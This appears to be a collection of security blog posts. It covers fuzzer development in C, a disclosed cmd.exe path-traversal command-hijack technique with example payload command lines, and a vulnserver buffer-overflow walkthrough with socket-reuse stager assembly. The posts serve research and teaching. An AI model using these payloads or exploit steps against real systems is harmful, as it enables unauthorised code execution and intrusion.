One of the biggest takeaways for me from doing this was just how much more performance you can squeeze out of a fuzzer if you just customize it for your target. Using out of the box frameworks like AFL is great and they are incredibly impressive tools, I hope this fuzzer will one day grow into something comparable. We were able to run about 20-30x faster than AFL for this really simple target and were able to crash it almost instantly with just a little bit of reverse engineering and customization. I thought this was really neat and instructive. In the future, when I adapt this fuzzer for a real target, I should be able to outperform frameworks again.

Ideas for Improvment

Where to begin? We have a lot of areas where we can improve but some immediate improvements that can be made are:

  • optimize performance by refactoring code, changing location of global variables
  • enabling the dynamic configuration of the fuzzer via a config file that can be created via a Python script
  • implementing more mutation methods
  • implementing more code coverage mechanisms
  • developing the fuzzer so that many instances can run in parallel and share discovered inputs/coverage data

Perhaps we will see these improvements in a subsequent post and the results of fuzzing a real target with the same general approach. Until then!

Code

All of the code for this blogpost can be found here: https://github.com/h0mbre/Fuzzing/tree/master/Caveman4

Cmd Hijack - a command/argument confusion with path traversal in cmd.exe

10 June 2020 at 05:43

This one is about an interesting behavior 🤭 I identified in cmd.exe in result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors.

So I was mostly trying to:

  • find an encoding missmatch between some command check/sanitization code and the rest of the program, allowing to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
  • discover some hidden cmd.exe's counterpart of the unix shells' backtick operator,
  • find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602.

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is 😃

For the lazy with no patience to read the whole thing, here comes the magic trick:


Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping 127.0.0.1",
whereas 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. PHP shell_exec() function and its variants).

Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary.

So the full command line becomes:

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system).


Although I am fairly sure there are some other scenarios with OS command execution whereas a part of the command line comes from a different security context than the final command is executed with (Some services maybe? I haven't search myself yet) - anyway let's use a web application as an example.

Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec).

And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes.

Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. Noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results - using my old evil SCA tool for PHP. Also that's what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe only to let me finally discover what this blog post is mostly about.

I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes).

Also, the notion of similar behavior in other command interpreters is also worth entertaining.

An extended POC

Normal use:

Abuse:

Now, this is what normal use looks like in Sysmon log (process creation event):

So basically the child process (ping.exe) is created with command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line.

Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in  %PATH%. We can traverse to any location on the same disk.

Also, we are not limited to the EXE extension, neither to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless to the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224).

And one more thing - more additional arguments between the original command and the smuggled executable path can be added.

Let's see all of this combined.

For the demonstrative purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):

Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file).

Action:

So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script.

But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload.

When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch.


For instance:

cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

executes c:\windows\system32\calc.exe with command line equal ping 127.0.0.1/../../../../../../../windows/system32/calc.exe.

And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:

ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin

This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough to invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE.
The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones.

Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE"

makes powershell start with command line of

ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells).

A perfect supported syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, having found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute.

Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I did not expect anyone would read it neither that I would reuse it), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well).  

I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming editions and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any found from its beginning), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play.

By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup.

This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug-> Restart).

We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances.

We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches.

If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe.

Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was at when the screenshot was taken - right before the second call of SearchForExecutable:

Now, on below screenshot the SearchForExecutable call already returned (note the full path to ping.exe pointed at with the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter  (Operation = CreateFile) if I did not create the file first...

One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg.

"We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable.

Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time.

Below we can see x64dbg with cmd.exe ran with cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI).  We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function. Just few instructions before calling ExecPgm, which is about to execute the PE pointed by R14. The full path to C:\Windows\System32\calc.exe present R14 is the result of the just-returned  SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe):

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering.

So I dug further into the SearchForExecutable function,  also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found.

I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats.

Cmd.exe first tries to interpret the whole string as a path: "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable.

There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”.

It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work).

So yeah... those evil spaces and quoting.

From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions.

Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

On one hand, I was little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I have wanted for some time.

On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it 😃 It's not a vulnerability, it's a technique 😃

I would like thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, whereas success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here 😃). In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises.

Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction from a unique discovery.

APC Series: User APC Internals

2 June 2020 at 21:00
Hey! This is the second part of the APC Series, If you haven’t read it I recommend you to read the first post about User APC API. where I explore the internals of APC objects in Windows. In this part I’ll explain: How to queue user APCs from kernel mode? How user APCs are implemented in the windows kernel? How user APCs are delivered to user mode? In this blog I won’t cover the internals of Special User APCs, because Special User APCs rely on Kernel APC to perform their operation - I’ll explore this type in a future post after I explain about Kernel APCs.

Multi-Stage EIP redirection Buffer Overflow -- Win API / Socket Reuse

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (KSTET)


Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:

~~~~~~//*****//~~~~~~

We get the initial crash using the following fuzzer.


...and we get a pretty vanilla EIP overwrite buffer overflow.


Calculating the offset as usual using Metasploit's pattern_offset.rb and pattern_create.rb



We have our offset value so at this point we will need to find JMP ESP address and redirect EIP to it. We will use address 0x625011AF.
Note that you can use Immunity Debugger's mona.py or just search it manually.


Updated POC with the offset value and JMP ESP address.


As we examine the crash in Immunity Debugger, we can see the correct offset value and hit our JMP ESP address however, once the jump is taken, our Cs have been truncated. As a result, this only gives us a space of about 20 bytes.


That said, we will use the C buffer space to do a reverse jmp to A's address space which allowed for roughly about 66 bytes of address space.

Reverse jump EB B8 and will jump as from address 0x00D0F9E0 to 0x00D0F99A


We update and send our exploit...then take the jump.


Once again, we examine the crash and see that we have successfully landed on A's address space.


Now the fun part begins..thanks to https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html for pointing out this type of vector.

Stolen from purpl3f0xsec...the diagram below shows how the socket connection is established between the client and the vulnserver.

Basically, we will utilize (reuse) the recv() function call. The idea is to utilize the established socket() connection and use the recv() as the first stage payload. Once the recv() function is up and running, we will then send our second stage payload.

The second stage payload will not overflow the buffer so it will not get truncated.



More information about the recv() can be found here: https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-recv

To set up recv(), we need the following parameters.


Socket = socket descriptor

Buffer = memory location for our second stage payload

BufferSize = memory space allocation for our second stage payload

Flags = Socket flags…can be set to Null


These are the parameters will need to be pushed to the stack (don't forget reverse order).


Before I populated the parameters, I grabbed the address of recv() which can be done by going in to the .text entry point and if we scroll down, we will find the functions.


Address 0x00401953 has the recv() but if you double click it...it shows the actual address which is 0x0040252C



I set a breakpoint at address 0x0040252C.


Once we hit our breakpoint, if you look at the stack, we can see the parameters that are currently loaded in the stack.


Note that at this point...both EAX and EBX registers have the socket descriptor value of 0x00000050. This is because of the instructions at these addresses: 0x0040194A and 0x00401950


0x0040194A - MOV EAX, DWORD PTR SS: [EBP-420]


This is a pointer to [EBP-420] so whatever the value loaded in [EBP-420] gets mov into EAX


We can see that EBP currently points to address 0x00EEFF88 so subtracting 420 should get us to the address that holds the socket descriptor.

 



As expected, if we jump to address 0x00EEFB68...we can see the value 0x00000050 loaded in.



Now, address 0x00401950 has the following instructions..


0x00401950 - MOV DWORD PTR SS:[ESP], EAX


This basically just loads the socket descriptor value stored in EAX, to the the [ESP] pointer. We can verify this by following ESP in the stack which currently points to address 0x011CF9E0



Next, we will load the value of socket descriptor to EAX. ASLR is enabled we will to do some math and ee will use ESP's address as a reference point.


We know that EBP register holds the socket descriptor located at address 0x00EEFB68. This means that we will need to do following:


 0x00EEFB68 (EBP) - 0x00EEF9E0 (ESP) = 188 (in hex)


Great..so we will need to add 188 to ESP. We will do this by pushing ESP into stack, and pop it to EAX then add 188 to EAX. If our calculation is correct, we should have the socket descriptor address (0x00EEFB68) loaded to EAX.


We run the following instuctions:


PUSH ESP

POP EAX

ADD AX, 188

 

And we can see that address 00EEFB68 is now loaded in EAX which contains the socket descriptor value of 0x00000050 as shown in the stack.



Great...now we have the socket descriptor easily accessible!


Re-aligning ESP


At this point, we will have to re-align ESP so that we don't arbitrarily overlap with our first stage instructions. As we push more instructions to the stack, especially in a small  address space, we risk overlaping our first stage with ESP.

That said, we need to move our ESP below where our first stage will be loaded.

We use the following instructions to adjust ESP:

SUB ESP, 6C                         ;SUB 108 from ESP

This makes ESP points to 0x00EEF974

***Note that towards the end of the exploit development, I found that ESP  needed to point directly below the recv() parameters. That meant I had to adjust ESP and only subtracted 64 which pointed it to address 0x00EEF97C instead.


At this point, we have accomplished the following:

1. Located the address for the recv() function
2. Located the address that holds the socket descriptor value
3. Loaded the socket descriptor value to EAX
4. Aligned the stack to ensure our first stage does not overlap with ESP

Now we are ready to populate the parameters for our recv() function call.

Note that we need 4 parameters for the this function call pushed to the stack in reverse order.


0x1 - Param #4 (Flags)

Since we are not setting any flags, we will set this parameter to NULL.

Using the EBX register...we zero it out using XOR instruction before pushing it to the stack

XOR, EBX, EBX
PUSH EBX


0x2 - Param #3 (Buffer Size)

For the buffer size, I picked about 1024 bytes of buffer space which is a lot more than what we need.

Utilizing the EBX register again which is already set to zero...we will add 400 (in hex) to it.

ADD BH, 4
PUSH EBX


0x3 - Param # 2 (Buffer Location)

I initialy pointed the buffer location to beginning of the Cs (0x00EEF9E4), however, it didn't work so I had to point it directly right after the four parameters. In this case, the buffer location has to be pointed to address 0x00EEF97C


We  can use the ESP address again...load the address into EBX then do some math which in this case I had to add 120 to ESP (HEX 78)

PUSH ESP
POP EBX
ADD EBX, 78
PUSH EBX



0x4 - Param #1 (Socket Descriptor)

Finally, for the socket descriptor we will need to access the value currently stored in EAX (not EAX address itself)

EAX is still pointing to 0x00EEFB68 that holds the socket descriptor value of 0x00000050


We can simply push the value stored in EAX using the following instruction:

PUSH DWORD PTR DS:[EAX]


...and we are done with the parameters. 

At this point, we should have the following parameters. 

Socket descriptor = 0x00000050

Buffer location = beginning of our C's (NOTE: this was adjusted to address 0x00EEF97C)

Buffer size = 400 (1024 in dec)

Flags = 0



Calling the RECV()

With the parameters set, we are now ready to call our RECV() function. Note that RECV() function is at adddress 0x0040252C


As you can see the recv() address contains null bytes which we will need to be removed. I learned something new from https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html as to how to remove these null bytes.

 

We simply use an arbitrary address such as removing the null bytes and adding 90 for the lowest byte: 0x40252C90 instead of 0x0040252C

 

So we move this arbitrary address to EAX:

 

MOV EAX, 40252C90

 

Then we shift to right by 8 bits which removes the last 8 bits (0x90) and adds 00 to the first 8 bits


SHR EAX, 8

 

Finally, we simply CALL EAX

 

Here just right before we execute CALL EAX, we can see that it currently points to the recv() address



That is the entire first stage...and we update our POC as shown below



We fire up the exploit one more, step through the stager, and we can see that we have all 4 parameters ready to go…they are followed with the address of where our payload will be loaded.


Second Stage / Reverse Shell

With our RECV() function ready, we can send our second stage payload.

We update our POC and see if we can add the Ds to memory.

Noe that I added a sleep(5) in between first and second stage. This ensures that our RECV() fucntion is ready before we send the second stage payload.


Here we can see that we have successfully loaded our Ds to memory at address 0x011EFD7C or 0x00EEFD7C (note ASLR).


We then replace the Ds with an actual reverse shell, fire up the exploit, and we get a reverse shell!





Thank you for reading.

Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage

By: h0mbre
26 May 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’, we’ll be continuing on our by noob for noobs fuzzing journey and trying to wrap our little baby fuzzing brains around the concept of code coverage and why its so important. As far as I know, code coverage is, at a high-level, the attempt made by fuzzers to track/increase how much of the target application’s code is reached by the fuzzer’s inputs. The idea being that the more code your fuzzer inputs reach, the greater the attack surface, the more comprehensive your testing is, and other big brain stuff that I don’t understand yet.

I’ve been working on my pwn skills, but taking short breaks for sanity to write some C and watch some @gamozolabs streams. @gamozolabs broke down the importance of code coverage during one of these streams, and I cannot for the life of me track down the clip, but I remembered it vaguely enough to set up some test cases just for my own testing to demonstrate why “dumb” fuzzers are so disadvantaged compared to code-coverage-guided fuzzers. Get ready for some (probably incorrect 🤣) 8th grade probability theory. By the end of this blog post, we should be able to at least understand, broadly, how state of the art fuzzers worked in 1990.

Our Fuzzer

We have this beautiful, error free, perfectly written, single-threaded jpeg mutation fuzzer that we’ve ported to C from our previous blog posts and tweaked a bit for the purposes of our experiments here.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h> 
#include <fcntl.h>

int crashes = 0;

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_data(char* fuzz_target) {

    FILE *fileptr;
    char *clone_data;
    long filelen;

    // open file in binary read mode
    // jump to end of file, get length
    // reset pointer to beginning of file
    fileptr = fopen(fuzz_target, "rb");
    if (fileptr == NULL) {
        printf("[!] Unable to open fuzz target, exiting...\n");
        exit(1);
    }
    fseek(fileptr, 0, SEEK_END);
    filelen = ftell(fileptr);
    rewind(fileptr);

    // cast malloc as char ptr
    // ptr offset * sizeof char = data in .jpeg
    clone_data = (char *)malloc(filelen * sizeof(char));

    // get length for struct returned
    size_t length = filelen * sizeof(char);

    // read in the data
    fread(clone_data, filelen, 1, fileptr);
    fclose(fileptr);

    struct ORIGINAL_FILE original_file;
    original_file.data = clone_data;
    original_file.length = length;

    return original_file;
}

void create_new(struct ORIGINAL_FILE original_file, size_t mutations) {

    //
    //----------------MUTATE THE BITS-------------------------
    //
    int* picked_indexes = (int*)malloc(sizeof(int)*mutations);
    for (int i = 0; i < (int)mutations; i++) {
        picked_indexes[i] = rand() % original_file.length;
    }

    char * mutated_data = (char*)malloc(original_file.length);
    memcpy(mutated_data, original_file.data, original_file.length);

    for (int i = 0; i < (int)mutations; i++) {
        char current = mutated_data[picked_indexes[i]];

        // figure out what bit to flip in this 'decimal' byte
        int rand_byte = rand() % 256;
        
        mutated_data[picked_indexes[i]] = (char)rand_byte;
    }

    //
    //---------WRITING THE MUTATED BITS TO NEW FILE-----------
    //
    FILE *fileptr;
    fileptr = fopen("mutated.jpeg", "wb");
    if (fileptr == NULL) {
        printf("[!] Unable to open mutated.jpeg, exiting...\n");
        exit(1);
    }
    // buffer to be written from,
    // size in bytes of elements,
    // how many elements,
    // where to stream the output to :)
    fwrite(mutated_data, 1, original_file.length, fileptr);
    fclose(fileptr);
    free(mutated_data);
    free(picked_indexes);
}

void exif(int iteration) {
    
    //fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");
    char* file = "vuln";
    char* argv[3];
    argv[0] = "vuln";
    argv[1] = "mutated.jpeg";
    argv[2] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);
        

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

int main(int argc, char** argv) {

    if (argc < 3) {
        printf("Usage: ./cfuzz <valid jpeg> <num of fuzz iterations>\n");
        printf("Usage: ./cfuzz Canon_40D.jpg 10000\n");
        exit(1);
    }

    // get our random seed
    srand((unsigned)time(NULL));

    char* fuzz_target = argv[1];
    struct ORIGINAL_FILE original_file = get_data(fuzz_target);
    printf("[>] Size of file: %ld bytes.\n", original_file.length);
    size_t mutations = (original_file.length - 4) * .02;
    printf("[>] Flipping up to %ld bytes.\n", mutations);

    int iterations = atoi(argv[2]);
    printf("[>] Fuzzing for %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        create_new(original_file, mutations);
        exif(i);
    }
    
    printf("\n[>] Fuzzing completed, exiting...\n");
    return 0;
}

Not going to spend a lot of time on the fuzzer’s features (what features?) here, but some important things about the fuzzer code:

  • it takes a file as input and copies the bytes from the file into a buffer
  • it calculates the length of the buffer in bytes, and then mutates 2% of the bytes by randomly overwriting them with arbitrary bytes
  • the function responsible for the mutation, create_new, doesn’t keep track of what byte indexes were mutated so theoretically, the same index could be chosen for mutation multiple times, so really, the fuzzer mutates up to 2% of the bytes.

Small Detour, I Apologize

We only have one mutation method here to keep things super simple, in doing so, I actually learned something really useful that I hadn’t clearly thought out previously. In a previous post I wondered, embarrassingly, aloud and in print, how much different random bit flipping was from random byte overwriting (flipping?). Well, it turns out, they are super different. Let’s take a minute to see how.

Let’s say we’re mutating an array of bytes called bytes. We’re mutating index 5. bytes[5] == \x41 (65 in decimal) in the unmutated, pristine original file. If we only bit flip, we are super limited in how much we can mutate this byte. 65 is 01000001 in binary. Let’s just go through at see how much it changes from arbitrarily flipping one bit:

  • Flipping first bit: 11000001 = 193,
  • Flipping second bit: 00000001 = 1,
  • Flipping third bit: 01100001 = 97,
  • Flipping fourth bit: 01010001 = 81,
  • Flipping fifth bit: 01001001 = 73,
  • Flipping sixth bit: 01000101 = 69,
  • Flipping seventh bit: 01000011 = 67, and
  • Flipping eighth bit: 010000001 = 64.

As you can see, we’re locked in to a severely limited amount of possibilities.

So for this program, I’ve opted to replace this mutation method with one that instead just substitutes a random byte instead of a bit within the byte.

Vulnerable Program

I wrote a simple cartoonish program to demonstrate how hard it can be for “dumb” fuzzers to find bugs. Imagine a target application that has several decision trees in the disassembly map view of the binary. The application performs 2-3 checks on the input to see if it meets certain criteria before passing the input to some sort of vulnerable function. Here is what I mean:

Our program does this exact thing, it retrieves the bytes of an input file and checks the bytes at an index 1/3rd of the file length, 1/2 of the file length, and 2/3 of the file length to see if the bytes in those positions match some hardcoded values (arbitrary). If all the checks are passed, the application copies the byte buffer into a small buffer causing a segfault to simulate a vulnerable function. Here is our program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_bytes(char* fileName) {

    FILE *filePtr;
    char* buffer;
    long fileLen;

    filePtr = fopen(fileName, "rb");
    if (!filePtr) {
        printf("[>] Unable to open %s\n", fileName);
        exit(-1);
    }
    
    if (fseek(filePtr, 0, SEEK_END)) {
        printf("[>] fseek() failed, wtf?\n");
        exit(-1);
    }

    fileLen = ftell(filePtr);
    if (fileLen == -1) {
        printf("[>] ftell() failed, wtf?\n");
        exit(-1);
    }

    errno = 0;
    rewind(filePtr);
    if (errno) {
        printf("[>] rewind() failed, wtf?\n");
        exit(-1);
    }

    long trueSize = fileLen * sizeof(char);
    printf("[>] %s is %ld bytes.\n", fileName, trueSize);
    buffer = (char *)malloc(fileLen * sizeof(char));
    fread(buffer, fileLen, 1, filePtr);
    fclose(filePtr);

    struct ORIGINAL_FILE original_file;
    original_file.data = buffer;
    original_file.length = trueSize;

    return original_file;
}

void check_one(char* buffer, int check) {

    if (buffer[check] == '\x6c') {
        return;
    }
    else {
        printf("[>] Check 1 failed.\n");
        exit(-1);
    }
}

void check_two(char* buffer, int check) {

    if (buffer[check] == '\x57') {
        return;
    }
    else {
        printf("[>] Check 2 failed.\n");
        exit(-1);
    }
}

void check_three(char* buffer, int check) {

    if (buffer[check] == '\x21') {
        return;
    }
    else {
        printf("[>] Check 3 failed.\n");
        exit(-1);
    }
}

void vuln(char* buffer, size_t length) {

    printf("[>] Passed all checks!\n");
